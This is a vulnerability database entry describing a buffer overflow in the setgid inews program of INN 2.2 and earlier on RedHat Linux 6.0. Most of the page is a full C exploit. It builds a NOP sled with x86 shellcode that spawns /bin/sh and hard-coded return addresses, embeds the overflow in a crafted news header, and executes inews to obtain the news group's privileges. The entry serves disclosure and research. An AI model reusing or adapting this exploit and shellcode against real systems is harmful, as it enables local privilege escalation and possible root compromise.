Lucene search
K

ISC INN <= 2.2,RedHat Linux <= 6.0 inews Buffer Overflow Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

INN inews Buffer Overflow Vulnerability in RedHat Linux 6.

Code

                                                source: http://www.securityfocus.com/bid/616/info


INN versions 2.2 and earlier have a buffer overflow-related security condition in the inews program.

inews is a program used to inject new postings into the news system. It is used by many news reading programs and scripts. The default installation is with inews setgid to the news group and world executable. It&#39;s possible that exploiting the buffer overflow could give the attacker news group privileges, which could possibly be extended to root access. 

/* inews exploit , gives you the inews egid .
* [email protected]
* greetz to nitro,shivan,rfp & Minus :)
*
*
* RET addresses change between RH 5.2 ,6.0 etc..
*
* RH 5.2 RET = 0xbffff6f0
* RH 6.0 RET = 0xbffff6e0 :&#62; pretty hard to guess huhuhu..
*/

#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;unistd.h&#62;
#include &#60;string.h&#62;
#define DEFAULT_OFFSET 0
#define BUFFER_SIZE 540
#define RET 0xbffff6f0



main (int argc, char *argv[])
{
FILE *fp;
int offset = 0;
char *buff = NULL;
int i;

u_char execshell[] =
&#34;\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07&#34;
&#34;\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12&#34;
&#34;\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8&#34;
&#34;\xd7\xff\xff\xff/bin/sh&#34;;



if (argc &#62; 1)
offset = atoi (argv[1]);

buff = malloc (1024);

if (!buff)
{
printf (&#34;malloc isnt working\n&#34;);
exit (0);
}

memset (buff, 0x90, BUFFER_SIZE);

for (i = 100; i &#60; BUFFER_SIZE - 4; i += 4)
*(long *) &buff[i] = RET + offset;

memcpy (buff + (100 - strlen (execshell)), execshell, strlen (execshell));

if ((fp = fopen (&#34;filez&#34;, &#34;w&#34;)) != NULL)
{
  fprintf (fp, &#34;From: %s\nSubject: y0\nNewsgroups: yaya le chat\n\n\n\n\n&#34;, 
buff);
  fclose (fp);
  execl (&#34;/usr/bin/inews&#34;, &#34;inews&#34;, &#34;-h&#34;, &#34;filez&#34;, NULL);
  }

else {
     printf (&#34;Couldnt open file : filez\n&#34;);
     exit (0);
     }

}

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
21